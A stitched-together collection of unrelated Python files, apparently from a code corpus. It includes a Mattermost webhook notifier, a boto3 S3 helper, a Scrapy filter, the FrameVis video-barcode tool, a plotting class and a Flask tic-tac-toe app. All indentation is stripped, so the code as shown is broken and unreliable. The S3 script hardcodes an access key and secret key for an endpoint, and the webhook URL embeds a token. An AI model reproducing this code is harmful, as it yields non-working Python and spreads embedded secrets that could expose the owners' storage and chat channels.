thetaMAP, samples = res_rto["thetaMAP"], res_rto["samples_corrected"]
print("thetaTruth: I = " + str(I_fnc(thetaTruth)) + " = " + str(Phi_fnc(thetaTruth)) + " (misfit) + " + str(norm1(thetaTruth, lam)) + " (norm)")
print("thetaMAP(sampling): I = " + str(I_fnc(thetaMAP)) + " = " + str(Phi_fnc(thetaMAP)) + " (misfit) + " + str(norm1(thetaMAP, lam)) + " (norm)")
print("thetaOpt(FISTA): I = " + str(I_fnc(thetaOpt)) + " = " + str(Phi_fnc(thetaOpt)) + " (misfit) + " + str(norm1(thetaOpt, lam)) + " (norm)")
plt.figure(3);
for n in range(17):
plt.plot(samples[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP, '.k-', label="th_MAP (from sampling)")
plt.plot(thetaTruth, '.g-', label="th_true")
plt.plot(thetaOpt, '.b-', label="th_OPT (from FISTA)")
plt.legend()
plt.figure(1);plt.ion()
plt.plot(xs_obs, y, 'r.', markersize=10, label="obs")
plt.plot(xx, f_fnc(thetaTruth, xx), 'g', label="th_true")
for n in range(17):
plt.plot(xx, f_fnc(samples[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k', label="th_MAP (from sampling)")
plt.plot(xx, yy, 'g')
plt.plot(xs_obs, y, 'r.', markersize=10)
plt.plot(xx, f_fnc(thetaOpt, xx), 'b', label="th_OPT (from FISTA)")
plt.legend()
plt.show()
"""
|
nilq/baby-python
|
python
|
import requests
import json
def send(text, path):
requests.post('https://meeting.ssafy.com/hooks/k13xxxszfp8z8ewir4qndiw63c',
data=json.dumps({"attachments": [{
"color": "#FF8000",
"text": str(text),
"author_name": "django",
"author_icon": "http://www.mattermost.org/wp-content/uploads/2016/04/icon_WS.png",
"title": path,
}]}),
headers={'Content-Type': 'application/json'}
)
|
nilq/baby-python
|
python
|
#-*- coding: utf-8 -*-
import datetime
from PyQt4 import QtGui
from campos import CampoNum, CampoCad
from controllers.orden_controller import initData, translateView, updateData, checkValidacion, Save
class OrdenView(QtGui.QGroupBox):
def __init__(self, parent=None):
super(OrdenView, self).__init__(parent)
self.label_numero = QtGui.QLabel(self)
self.text_numero = CampoNum(self, u"Número de orden")
self.label_fecha = QtGui.QLabel(self)
self.date_fecha = QtGui.QDateEdit(self)
self.label_bien_servicio = QtGui.QLabel(self)
self.text_bien_servicio = CampoNum(self, u"Bien/servicio")
self.label_rubro = QtGui.QLabel(self)
self.text_rubro = CampoCad(self, u"Rubro")
self.fila_orden = QtGui.QHBoxLayout()
self.fila_orden.addWidget(self.label_numero)
self.fila_orden.addWidget(self.text_numero)
self.fila_orden.addWidget(self.label_fecha)
self.fila_orden.addWidget(self.date_fecha)
self.fila_orden.addWidget(self.label_bien_servicio)
self.fila_orden.addWidget(self.text_bien_servicio)
self.fila_orden.addWidget(self.label_rubro)
self.fila_orden.addWidget(self.text_rubro)
self.setLayout(self.fila_orden)
self.translate_view()
init_data = initData
translate_view = translateView
update_data = updateData
check_validacion = checkValidacion
save = Save
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
from distutils.core import setup
import os
os.system("make ")
setup(name='pi',
version='1.0',
description='pi digits compute',
author='mathm',
author_email='mingtinglai@58.com',
url="https://igit.58corp.com/mingtinglai/pi",
)
|
nilq/baby-python
|
python
|
import os
import sys
import threading
import boto3
import logging
import shutil
from botocore.client import Config
from matplotlib import pyplot as plt
from botocore.exceptions import ClientError
from boto3.s3.transfer import TransferConfig
END_POINT_URL = 'http://uvo1baooraa1xb575uc.vm.cld.sr/'
A_KEY = 'AKIAtEpiGWUcQIelPRlD1Pi6xQ'
S_KEY = 'YNV6xS8lXnCTGSy1x2vGkmGnmdJbZSapNXaSaRhK'
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write("\r%s %s / %s (%.2f%%)" %
(self._filename, self._seen_so_far,
self._size, percentage))
sys.stdout.flush()
"""Functions for buckets operation"""
def create_bucket_op(bucket_name, region):
if region is None:
s3_client.create_bucket(Bucket=bucket_name)
else:
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
def list_bucket_op(bucket_name, region, operation):
buckets = s3_client.list_buckets()
if buckets['Buckets']:
for bucket in buckets['Buckets']:
print(bucket)
return True
else:
logging.error('unknown bucket operation')
return False
def bucket_operation(bucket_name, region=None, operation='list'):
try:
if operation == 'delete':
s3_client.delete_bucket(Bucket=bucket_name)
elif operation == 'create':
create_bucket_op(bucket_name, region)
elif operation == 'list':
return list_bucket_op(bucket_name, region, operation)
else:
logging.error('unknown bucket operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
def upload_download_op_file(bucket_name, file_name, file_location,
region, operation):
if not file_location:
logging.error('The file location %d is missing for %s operation!'
% (file_location, operation))
return False
if operation == 'download':
s3_resource.Bucket(bucket_name).download_file(file_name, file_location)
elif operation == 'upload' and region is None:
s3_resource.Bucket(bucket_name).upload_file(file_location, file_name)
else:
location = {'LocationConstraint': region}
s3_resource.Bucket(bucket_name
).upload_file(file_location, file_name,
CreateBucketConfiguration=location)
return True
"""Functions for files operation"""
def list_op_file(bucket_name):
current_bucket = s3_resource.Bucket(bucket_name)
print('The files in bucket %s:\n' % (bucket_name))
for obj in current_bucket.objects.all():
print(obj.meta.data)
return True
def delete_op_file(bucket_name, file_name, operation):
if not file_name:
logging.error('The file name %s is missing for%s operation!'
% (file_name, operation))
return False
s3_client.delete_object(Bucket=bucket_name, Key=file_name)
return True
def file_operation(bucket_name=None, file_name=None, file_location=None,
region=None, operation='list'):
if not bucket_name:
logging.error('The bucket name is %s missing!' % (bucket_name))
return False
try:
if operation == 'list':
return list_op_file(bucket_name)
elif operation == 'delete':
return delete_op_file(bucket_name, file_name, operation)
elif operation == 'upload' or operation == 'download':
return upload_download_op_file(bucket_name, file_name,
file_location, region, operation)
else:
logging.error('unknown file operation')
return False
except ClientError as e:
logging.error(e)
return False
return True
s3_resource = boto3.resource('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
s3_client = boto3.client('s3', endpoint_url=END_POINT_URL,
aws_access_key_id=A_KEY,
aws_secret_access_key=S_KEY,
config=Config(signature_version='s3v4'),
region_name='US')
bucket_name = 'detection'
file_name = r'0_5.txt'
# path_file_upload = r'C:\PycharmProjects\cortxHackton\upload\0_5.txt'
# assert os.path.isfile(path_file_upload)
# with open(path_file_upload, "r") as f:
# pass
path_file_download = r'download\0_5.txt'
path_save = ''
if bucket_operation(bucket_name, None, 'list'):
print("Bucket creation completed successfully!")
#
# if file_operation(bucket_name, file_name, path_file_upload, None, 'upload'):
# print("Uploading file to S3 completed successfully!")
if file_operation(bucket_name, file_name, path_file_download, None, 'download'):
print("Downloading the file to S3 has been completed successfully!")
# if file_operation(bucket_name, file_name, path_file_download, None, 'delete'):
# print("Downloading the file to S3 has been completed successfully!")
# zip_point = ''
# shutil.make_archive(zip_point, 'zip', path_save)
# if file_operation(bucket_name, '.json', path_save + '.json', None, 'upload'):
# print("Uploading file to S3 completed successfully!")
|
nilq/baby-python
|
python
|
#coding:utf-8
import hashlib
from scrapy.dupefilters import RFPDupeFilter
from scrapy.utils.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None, debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1)
|
nilq/baby-python
|
python
|
from sys import *
sid = 11 if len(argv) <= 1 else int(argv[1])
from random import *
seed(sid)
for cas in range(int(input())):
input()
m = {}
for i, v in enumerate(map(int, input().split())): m.setdefault(v, []).append(i)
b = [v for i, v in sorted((choice(l), v) for v, l in m.items())]
print(len(b))
print(*b)
|
nilq/baby-python
|
python
|
#
# Project FrameVis - Video Frame Visualizer Script
# @author David Madison
# @link github.com/dmadison/FrameVis
# @version v1.0.1
# @license MIT - Copyright (c) 2019 David Madison
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import cv2
import numpy as np
import argparse
from enum import Enum, auto
import time
class FrameVis:
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
"""
default_frame_height = None # auto, or in pixels
default_frame_width = None # auto, or in pixels
default_concat_size = 1 # size of concatenated frame if automatically calculated, in pixels
default_direction = "horizontal" # left to right
def visualize(self, source, nframes, height=default_frame_height, width=default_frame_width, \
direction=default_direction, trim=False, quiet=True):
"""
Reads a video file and outputs an image comprised of n resized frames, spread evenly throughout the file.
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to process from the video
height (int): height of each frame, in pixels
width (int): width of each frame, in pixels
direction (str): direction to concatenate frames ("horizontal" or "vertical")
quiet (bool): suppress console messages
Returns:
visualization image as numpy array
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
if not quiet:
print("") # create space from script call line
# calculate keyframe interval
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nframes, int) or nframes < 1:
raise ValueError("Number of frames must be a positive integer")
elif nframes > video_total_frames:
raise ValueError("Requested frame count larger than total available ({})".format(video_total_frames))
keyframe_interval = video_total_frames / nframes # calculate number of frames between captures
# grab frame for dimension calculations
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
# calculate letterbox / pillarbox trimming, if specified
matte_type = 0
if trim == True:
if not quiet:
print("Trimming enabled, checking matting... ", end="", flush=True)
# 10 frame samples, seen as matted if an axis has all color channels at 3 / 255 or lower (avg)
success, cropping_bounds = MatteTrimmer.determine_video_bounds(source, 10, 3)
matte_type = 0
if success: # only calculate cropping if bounds are valid
crop_width = cropping_bounds[1][0] - cropping_bounds[0][0] + 1
crop_height = cropping_bounds[1][1] - cropping_bounds[0][1] + 1
if crop_height != image.shape[0]: # letterboxing
matte_type += 1
if crop_width != image.shape[1]: # pillarboxing
matte_type +=2
if not quiet:
if matte_type == 0:
print("no matting detected")
elif matte_type == 1:
print("letterboxing detected, cropping {} px from the top and bottom".format(int((image.shape[0] - crop_height) / 2)))
elif matte_type == 2:
print("pillarboxing detected, trimming {} px from the sides".format(int((image.shape[1] - crop_width) / 2)))
elif matte_type == 3:
print("multiple matting detected - cropping ({}, {}) to ({}, {})".format(image.shape[1], image.shape[0], crop_width, crop_height))
# calculate height
if height is None: # auto-calculate
if direction == "horizontal": # non-concat, use video size
if matte_type & 1 == 1: # letterboxing present
height = crop_height
else:
height = image.shape[0] # save frame height
else: # concat, use default value
height = FrameVis.default_concat_size
elif not isinstance(height, int) or height < 1:
raise ValueError("Frame height must be a positive integer")
# calculate width
if width is None: # auto-calculate
if direction == "vertical": # non-concat, use video size
if matte_type & 2 == 2: # pillarboxing present
width = crop_width
else:
width = image.shape[1] # save frame width
else: # concat, use default value
width = FrameVis.default_concat_size
elif not isinstance(width, int) or width < 1:
raise ValueError("Frame width must be a positive integer")
# assign direction function and calculate output size
if direction == "horizontal":
concatenate = cv2.hconcat
output_width = width * nframes
output_height = height
elif direction == "vertical":
concatenate = cv2.vconcat
output_width = width
output_height = height * nframes
else:
raise ValueError("Invalid direction specified")
if not quiet:
aspect_ratio = output_width / output_height
print("Visualizing \"{}\" - {} by {} ({:.2f}), from {} frames (every {:.2f} seconds)"\
.format(source, output_width, output_height, aspect_ratio, nframes, FrameVis.interval_from_nframes(source, nframes)))
# set up for the frame processing loop
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
finished_frames = 0 # counter for number of processed frames
output_image = None
progress = ProgressBar("Processing:")
while True:
if finished_frames == nframes:
break # done!
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file (frame {} out of {})".format(int(next_keyframe), video_total_frames))
if matte_type != 0: # crop out matting, if specified and matting is present
image = MatteTrimmer.crop_image(image, cropping_bounds)
image = cv2.resize(image, (width, height)) # resize to output size
# save to output image
if output_image is None:
output_image = image
else:
output_image = concatenate([output_image, image]) # concatenate horizontally from left -> right
finished_frames += 1
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
if not quiet:
progress.write(finished_frames / nframes) # print progress bar to the console
video.release() # close video capture
return output_image
@staticmethod
def average_image(image, direction):
"""
Averages the colors in an axis across an entire image
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction to average frames ("horizontal" or "vertical")
Returns:
image, with pixel data averaged along provided axis
"""
height, width, depth = image.shape
if direction == "horizontal":
scale_height = 1
scale_width = width
elif direction == "vertical":
scale_height = height
scale_width = 1
else:
raise ValueError("Invalid direction specified")
image = cv2.resize(image, (scale_width, scale_height)) # scale down to '1', averaging values
image = cv2.resize(image, (width, height)) # scale back up to size
return image
@staticmethod
def motion_blur(image, direction, blur_amount):
"""
Blurs the pixels in a given axis across an entire image.
Parameters:
image (arr x.y.c): image as 3-dimensional numpy array
direction (str): direction of stacked images for blurring ("horizontal" or "vertical")
blur_amount (int): how much to blur the image, as the convolution kernel size
Returns:
image, with pixel data blurred along provided axis
"""
kernel = np.zeros((blur_amount, blur_amount)) # create convolution kernel
# fill group with '1's
if direction == "horizontal":
kernel[:, int((blur_amount - 1)/2)] = np.ones(blur_amount) # fill center column (blurring vertically for horizontal concat)
elif direction == "vertical":
kernel[int((blur_amount - 1)/2), :] = np.ones(blur_amount) # fill center row (blurring horizontally for vertical concat)
else:
raise ValueError("Invalid direction specified")
kernel /= blur_amount # normalize kernel matrix
return cv2.filter2D(image, -1, kernel) # filter using kernel with same depth as source
@staticmethod
def nframes_from_interval(source, interval):
"""
Calculates the number of frames available in a video file for a given capture interval
Parameters:
source (str): filepath to source video file
interval (float): capture frame every i seconds
Returns:
number of frames per time interval (int)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
duration = frame_count / fps # duration of the video, in seconds
video.release() # close video capture
return int(round(duration / interval)) # number of frames per interval
@staticmethod
def interval_from_nframes(source, nframes):
"""
Calculates the capture interval, in seconds, for a video file given the
number of frames to capture
Parameters:
source (str): filepath to source video file
nframes (int): number of frames to capture from the video file
Returns:
time interval (seconds) between frame captures (float)
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
frame_count = video.get(cv2.CAP_PROP_FRAME_COUNT) # total number of frames
fps = video.get(cv2.CAP_PROP_FPS) # framerate of the video
keyframe_interval = frame_count / nframes # calculate number of frames between captures
video.release() # close video capture
return keyframe_interval / fps # seconds between captures
class MatteTrimmer:
"""
Functions for finding and removing black mattes around video frames
"""
@staticmethod
def find_matrix_edges(matrix, threshold):
"""
Finds the start and end points of a 1D array above a given threshold
Parameters:
matrix (arr, 1.x): 1D array of data to check
threshold (value): valid data is above this trigger level
Returns:
tuple with the array indices of data bounds, start and end
"""
if not isinstance(matrix, (list, tuple, np.ndarray)) or len(matrix.shape) != 1:
raise ValueError("Provided matrix is not the right size (must be 1D)")
data_start = None
data_end = None
for value_id, value in enumerate(matrix):
if value > threshold:
if data_start is None:
data_start = value_id
data_end = value_id
return (data_start, data_end)
@staticmethod
def find_larger_bound(first, second):
"""
Takes two sets of diagonal rectangular boundary coordinates and determines
the set of rectangular boundary coordinates that contains both
Parameters:
first (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Where for both arrays the first coordinate is in the top left-hand corner,
and the second coordinate is in the bottom right-hand corner.
Returns:
numpy coordinate matrix containing both of the provided boundaries
"""
left_edge = first[0][0] if first[0][0] <= second[0][0] else second[0][0]
right_edge = first[1][0] if first[1][0] >= second[1][0] else second[1][0]
top_edge = first[0][1] if first[0][1] <= second[0][1] else second[0][1]
bottom_edge = first[1][1] if first[1][1] >= second[1][1] else second[1][1]
return np.array([[left_edge, top_edge], [right_edge, bottom_edge]])
@staticmethod
def valid_bounds(bounds):
"""
Checks if the frame bounds are a valid format
Parameters:
bounds (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
True or False
"""
for x, x_coordinate in enumerate(bounds):
for y, y_coordinate in enumerate(bounds):
if bounds[x][y] is None:
return False # not a number
if bounds[0][0] > bounds[1][0] or \
bounds[0][1] > bounds[1][1]:
return False # left > right or top > bottom
return True
@staticmethod
def determine_image_bounds(image, threshold):
"""
Determines if there are any hard mattes (black bars) surrounding
an image on either the top (letterboxing) or the sides (pillarboxing)
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
image_bounds: numpy coordinate matrix with the two opposite corners of the
image bounds, in the form [(X,Y), (X,Y)]
"""
height, width, depth = image.shape
# check for letterboxing
horizontal_sums = np.sum(image, axis=(1,2)) # sum all color channels across all rows
hthreshold = (threshold * width * depth) # must be below every pixel having a value of "threshold" in every channel
vertical_edges = MatteTrimmer.find_matrix_edges(horizontal_sums, hthreshold)
# check for pillarboxing
vertical_sums = np.sum(image, axis=(0,2)) # sum all color channels across all columns
vthreshold = (threshold * height * depth) # must be below every pixel having a value of "threshold" in every channel
horizontal_edges = MatteTrimmer.find_matrix_edges(vertical_sums, vthreshold)
image_bounds = np.array([[horizontal_edges[0], vertical_edges[0]], [horizontal_edges[1], vertical_edges[1]]])
return MatteTrimmer.valid_bounds(image_bounds), image_bounds
@staticmethod
def determine_video_bounds(source, nsamples, threshold):
"""
Determines if any matting exists in a video source
Parameters:
source (str): filepath to source video file
nsamples (int): number of frames from the video to determine bounds,
evenly spaced throughout the video
threshold (8-bit int): min color channel value to judge as 'image present'
Returns:
success (bool): True or False if the bounds are valid
video_bounds: numpy coordinate matrix with the two opposite corners of the
video bounds, in the form [(X,Y), (X,Y)]
"""
video = cv2.VideoCapture(source) # open video file
if not video.isOpened():
raise FileNotFoundError("Source Video Not Found")
video_total_frames = video.get(cv2.CAP_PROP_FRAME_COUNT) # retrieve total frame count from metadata
if not isinstance(nsamples, int) or nsamples < 1:
raise ValueError("Number of samples must be a positive integer")
keyframe_interval = video_total_frames / nsamples # calculate number of frames between captures
# open video to make results consistent with visualizer
# (this also GREATLY increases the read speed? no idea why)
success,image = video.read() # get first frame
if not success:
raise IOError("Cannot read from video file")
next_keyframe = keyframe_interval / 2 # frame number for the next frame grab, starting evenly offset from start/end
video_bounds = None
for frame_number in range(nsamples):
video.set(cv2.CAP_PROP_POS_FRAMES, int(next_keyframe)) # move cursor to next sampled frame
success,image = video.read() # read the next frame
if not success:
raise IOError("Cannot read from video file")
success, frame_bounds = MatteTrimmer.determine_image_bounds(image, threshold)
if not success:
continue # don't compare bounds, frame bounds are invalid
video_bounds = frame_bounds if video_bounds is None else MatteTrimmer.find_larger_bound(video_bounds, frame_bounds)
next_keyframe += keyframe_interval # set next frame capture time, maintaining floats
video.release() # close video capture
return MatteTrimmer.valid_bounds(video_bounds), video_bounds
@staticmethod
def crop_image(image, bounds):
"""
Crops a provided image by the coordinate bounds pair provided.
Parameters:
image (arr, x.y.c): image as 3-dimensional numpy array
second (arr, 1.2.2): pair of rectangular coordinates, in the form [(X,Y), (X,Y)]
Returns:
image as 3-dimensional numpy array, cropped to the coordinate bounds
"""
return image[bounds[0][1]:bounds[1][1], bounds[0][0]:bounds[1][0]]
class ProgressBar:
"""
Generates a progress bar for the console output
Args:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_elapsed (bool): option to print time elapsed or not
Attributes:
pre (str): string to prepend before the progress bar
bar_length (int): length of the progress bar itself, in characters
print_time (bool): option to print time elapsed or not
print_elapsed (int): starting time for the progress bar, in unix seconds
"""
def __init__(self, pre="", bar_length=25, print_elapsed=True):
pre = (pre + '\t') if pre != "" else pre # append separator if string present
self.pre = pre
self.bar_length = bar_length
self.print_elapsed = print_elapsed
if self.print_elapsed:
self.__start_time = time.time() # store start time as unix
def write(self, percent):
"""Prints a progress bar to the console based on the input percentage (float)."""
term_char = '\r' if percent < 1.0 else '\n' # rewrite the line unless finished
filled_size = int(round(self.bar_length * percent)) # number of 'filled' characters in the bar
progress_bar = "#" * filled_size + " " * (self.bar_length - filled_size) # progress bar characters, as a string
time_string = ""
if self.print_elapsed:
time_elapsed = time.time() - self.__start_time
time_string = "\tTime Elapsed: {}".format(time.strftime("%H:%M:%S", time.gmtime(time_elapsed)))
print("{}[{}]\t{:.2%}{}".format(self.pre, progress_bar, percent, time_string), end=term_char, flush=True)
def main():
parser = argparse.ArgumentParser(description="video frame visualizer and movie barcode generator", add_help=False) # removing help so I can use '-h' for height
parser.add_argument("source", help="file path for the video file to be visualized", type=str)
parser.add_argument("destination", help="file path output for the final image", type=str)
parser.add_argument("-n", "--nframes", help="the number of frames in the visualization", type=int)
parser.add_argument("-i", "--interval", help="interval between frames for the visualization", type=float)
parser.add_argument("-h", "--height", help="the height of each frame, in pixels", type=int, default=FrameVis.default_frame_height)
parser.add_argument("-w", "--width", help="the output width of each frame, in pixels", type=int, default=FrameVis.default_frame_width)
parser.add_argument("-d", "--direction", help="direction to concatenate frames, horizontal or vertical", type=str, \
choices=["horizontal", "vertical"], default=FrameVis.default_direction)
parser.add_argument("-t", "--trim", help="detect and trim any hard matting (letterboxing or pillarboxing)", action='store_true', default=False)
parser.add_argument("-a", "--average", help="average colors for each frame", action='store_true', default=False)
parser.add_argument("-b", "--blur", help="apply motion blur to the frames (kernel size)", type=int, nargs='?', const=100, default=0)
parser.add_argument("-q", "--quiet", help="mute console outputs", action='store_true', default=False)
parser.add_argument("--help", action="help", help="show this help message and exit")
args = parser.parse_args()
# check number of frames arguments
if args.nframes is None:
if args.interval is not None: # calculate nframes from interval
args.nframes = FrameVis.nframes_from_interval(args.source, args.interval)
else:
parser.error("You must provide either an --(n)frames or --(i)nterval argument")
# check postprocessing arguments
if args.average is True and args.blur != 0:
parser.error("Cannot (a)verage and (b)lur, you must choose one or the other")
fv = FrameVis()
output_image = fv.visualize(args.source, args.nframes, height=args.height, width=args.width, \
direction=args.direction, trim=args.trim, quiet=args.quiet)
# postprocess
if args.average or args.blur != 0:
if args.average:
if not args.quiet:
print("Averaging frame colors... ", end="", flush=True)
output_image = fv.average_image(output_image, args.direction)
if args.blur != 0:
if not args.quiet:
print("Adding motion blur to final frame... ", end="", flush=True)
output_image = fv.motion_blur(output_image, args.direction, args.blur)
if not args.quiet:
print("done")
cv2.imwrite(args.destination, output_image) # save visualization to file
if not args.quiet:
print("Visualization saved to {}".format(args.destination))
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import os
import pickle
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from task_dyva.utils import save_figure
from task_dyva.visualization import PlotModelLatents
class FigureS6():
"""Analysis methods and plotting routines to reproduce
Figure S6 from the manuscript (example latent state trajectories).
"""
analysis_dir = 'model_analysis'
stats_fn = 'holdout_outputs_01SD.pkl'
fp_fn = 'fixed_points.pkl'
age_bins = ['ages20to29', 'ages30to39', 'ages40to49',
'ages50to59', 'ages60to69', 'ages70to79', 'ages80to89']
plot_age_bins = ['ages20to29', 'ages50to59', 'ages80to89']
plot_titles = ['Ages 20 to 29', 'Ages 50 to 59', 'Ages 80 to 89']
figsize = (9, 13)
figdpi = 300
def __init__(self, model_dir, save_dir, metadata):
self.model_dir = model_dir
self.save_dir = save_dir
self.expts = metadata['name']
self.age_bins = metadata['age_range']
self.sc_status = metadata['switch_cost_type']
# Containers for summary stats
self.all_stats = {ab: [] for ab in self.age_bins}
self.all_fps = {ab: [] for ab in self.age_bins}
def make_figure(self):
print('Making Figure S6...')
self._run_preprocessing()
fig = self._plot_figure()
save_figure(fig, self.save_dir, 'FigS6')
print('')
def _run_preprocessing(self):
for expt_str, ab, sc in zip(self.expts,
self.age_bins,
self.sc_status):
# Skip sc- models
if sc == 'sc-':
continue
# Load stats from the holdout data
stats_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.stats_fn)
with open(stats_path, 'rb') as path:
expt_stats = pickle.load(path)
# Load fixed points
fp_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.fp_fn)
with open(fp_path, 'rb') as path:
fps = pickle.load(path)
self.all_stats[ab].append(expt_stats)
self.all_fps[ab].append(fps)
def _plot_figure(self):
fig = plt.figure(figsize=self.figsize, dpi=self.figdpi)
nrows = 5
t_post = 1200
elev, azim = 30, 60
for ab_ind, ab in enumerate(self.plot_age_bins):
this_stats = self.all_stats[ab]
this_fps = self.all_fps[ab]
this_means = np.array([s.summary_stats['u_mean_rt']
for s in this_stats])
sort_inds = np.argsort(this_means)
plot_inds = np.arange(0, len(sort_inds), 20 // nrows)
for ax_ind, p in enumerate(plot_inds):
subplot_ind = ax_ind * 3 + ab_ind + 1
ax = fig.add_subplot(nrows, 3, subplot_ind, projection='3d')
plot_stats = this_stats[sort_inds[p]]
plot_fps = this_fps[sort_inds[p]]
# Plot
if ax_ind == 0 and ab_ind == 0:
kwargs = {'annotate': True}
else:
kwargs = {'annotate': False}
plotter = PlotModelLatents(plot_stats, post_on_dur=t_post,
fixed_points=plot_fps, plot_pre_onset=False)
ax = plotter.plot_main_conditions(ax, elev=elev, azim=azim,
**kwargs)
if ax_ind == 0:
ax.set_title(self.plot_titles[ab_ind])
return fig
|
nilq/baby-python
|
python
|
import random
from flask import render_template, redirect, flash, url_for, request, jsonify
from flask_login import login_user, logout_user, current_user, login_required
from sqlalchemy import desc
from app import app, db, login_manager, forms
from app.models import User, Game, GameMove
from app.decorators import not_in_game
@app.route("/")
@login_required
@not_in_game
def index():
games_in_wait = Game.query.filter_by(state=Game.game_state['waiting_for_players']).limit(5)
games_in_progress = Game.query.filter_by(state=Game.game_state['in_progress']).limit(5)
return render_template('index.html', games_in_progress=games_in_progress, games_in_wait=games_in_wait)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
if request.method == 'POST':
form = forms.LoginForm(request.form)
else:
form = forms.LoginForm()
if form.validate_on_submit():
user = User.get_authenticated_user(form.username.data, form.password.data)
if user:
login_user(user)
return redirect(url_for('index'))
flash('Can not find this combination of username and password')
return render_template('login.html', login_form=form)
@app.route("/logout", methods=['POST'])
def logout():
logout_user()
return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
if request.method == 'POST':
form = forms.RegisterForm(request.form)
else:
form = forms.RegisterForm()
if form.validate_on_submit():
user = User(form.username.data, form.password.data, form.email.data)
db.session.add(user)
db.session.commit()
login_user(user)
# Redirect to homepage, if user is successfully authenticated
if current_user.is_authenticated:
flash('Welcome to the Tic-Tac-Toe!', 'success')
return redirect(url_for('index'))
return render_template('register.html', register_form=form)
@app.route("/game/new", methods=['GET', 'POST'])
@login_required
@not_in_game
def new_game():
if request.method == 'POST':
form = forms.NewGameForm(request.form)
else:
form = forms.NewGameForm()
if form.validate_on_submit():
# generate random players order in game
user_order = random.choice([1, 2])
if user_order == 1:
game = Game(field_size=form.size.data, win_length=form.rule.data, player1=current_user)
else:
game = Game(field_size=form.size.data, win_length=form.rule.data, player2=current_user)
db.session.add(game)
db.session.commit()
return redirect(url_for('show_game', game_id=game.id))
return render_template('new_game.html', new_game_form=form)
@app.route("/game/join/<int:game_id>", methods=['POST'])
@login_required
def join_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id and game.player2:
# redirect back to the game if it's full
flash('Current game is already in progress')
return redirect(url_for('show_game', game_id=game_id))
# check available player position in game
if game.player1_id is None:
game.player1 = current_user
else:
game.player2 = current_user
game.state = Game.game_state['in_progress']
db.session.commit()
return redirect(url_for('show_game', game_id=game_id))
@app.route("/game/flee", methods=['POST'])
@login_required
def flee_game():
game = current_user.current_game
# if there is no game to flee, redirect to homepage
if not game:
flash('There is no game to flee')
return redirect(url_for('index'))
game.state = Game.game_state['finished']
if game.player1_id == current_user.id:
opponent = game.player2
result = Game.game_result['player_two_win']
else:
opponent = game.player1
result = Game.game_result['player_one_win']
# if there was a second player in a game, let him win
if opponent:
game.result = result
db.session.commit()
return redirect(url_for('index'))
